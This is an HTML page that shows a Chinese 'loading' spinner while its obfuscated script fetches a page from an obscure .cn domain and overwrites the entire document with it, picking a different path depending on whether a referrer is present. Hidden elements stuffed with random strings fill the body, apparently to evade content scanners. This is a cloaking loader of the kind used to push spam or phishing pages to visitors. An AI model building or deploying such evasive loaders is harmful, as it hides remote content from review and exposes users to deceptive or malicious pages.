<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .knbBL8Ijc {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .knbBL8Ijc .Br7c4c9fo {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .knbBL8Ijc .content {
            line-height: 50px;
            text-align: center
        }

        .knbBL8Ijc .img {
            width: 100%
        }

        .knbBL8Ijc .HejkZrE {
            text-align: center
        }

        .knbBL8Ijc .HejkZrE span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .knbBL8Ijc .HejkZrE span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .knbBL8Ijc .HejkZrE span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .knbBL8Ijc .HejkZrE span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .knbBL8Ijc .HejkZrE span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .knbBL8Ijc .HejkZrE span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .knbBL8Ijc .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function P2zAzkEFh(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var TP5pvkF = P2zAzkEFh('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ TP5pvkF +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ TP5pvkF +".html?a=share";
		}
		
        cRHyhK=url+"#"+new Date().getTime();
        cRHyhK && function() {
            $.get(cRHyhK, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>d7CV8DGBnbrfg8V3Y15TiaKxy7OPhpDM2iixQKUakFsKtIz2yV2aQbYOTLiQZp225</a>
<p  style='display:none'>mFACMpikZwu0uKsOGg1EbBAwpaP9Z3c7460qIeHHQKHLnZtgEeU4P8FW0mPpGcxy8IIJLeq</p>
<b style='display:none' >BJUfMx2XTUoHrHHnffbgLyGgfzKElZnBq3InVGb90Gtj1lF4Y0Id1vrNoGWs9fzEIIY4v7IooceCltCDilbDMwrvyNoypZfm</b>
<div style='display:none'>o49J5HluL4Aw8Z6JbkX</div>
<img  src='' style='display:none'>
<b style='display:none' >BJUfMx2XTUoHrHHnffbgLyGgfzKElZnBq3InVGb90Gtj1lF4Y0Id1vrNoGWs9fzEIIY4v7IooceCltCDilbDMwrvyNoypZfm</b>
<h1 style='display:none' >iKypirCuEXb8CdlxwItu0X6JfUpoxEtGVlZ2MCXr47FDUw6DeJRBp3zSuIoglOIq9HoMB</h1>
<li style='display:none' >FdEFFlpSjaBevTh6Crro6KfIbvdVyVokmdPVGqBj9bhfinDcLEJpMXqPPOYFaI8NutxCSj65wcPWD6TwaTl3JLZMawzm383v</li>
<a  href='#' style='display:none'>d7CV8DGBnbrfg8V3Y15TiaKxy7OPhpDM2iixQKUakFsKtIz2yV2aQbYOTLiQZp225</a><div class="knbBL8Ijc">
    <div class="Br7c4c9fo">
        <div class="HejkZrE">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<li style='display:none' >KlYBPUjpJWqLZQWmgG6UyGovKTSElJVSDLEqojxivvafNi4D6kz5ie9</li>
<b style='display:none' >vIFX2o2LJSZB</b>
<div style='display:none'>qbOmKQpNTUThlUo3j1gvUWcoJgJuck2gKrmJ6VOy7Mrw5athDKOFmoRHNd0KmL711VHKYjOLaK</div>
<p  style='display:none'>zSz28WdGszMENfiAgqh5MaTloyVNRd9xPG41Ny25Xbjxcsausnt5RcTNJf807u3JXroM4xsVgKuG503f1v</p>
<li style='display:none' >KlYBPUjpJWqLZQWmgG6UyGovKTSElJVSDLEqojxivvafNi4D6kz5ie9</li>
<li style='display:none' >KlYBPUjpJWqLZQWmgG6UyGovKTSElJVSDLEqojxivvafNi4D6kz5ie9</li>
<span style='display:none'>y0zuptKZXxvObjVuMIXq4jm8aX</span>
<span style='display:none'>y0zuptKZXxvObjVuMIXq4jm8aX</span>
<p  style='display:none'>zSz28WdGszMENfiAgqh5MaTloyVNRd9xPG41Ny25Xbjxcsausnt5RcTNJf807u3JXroM4xsVgKuG503f1v</p></body>
</html>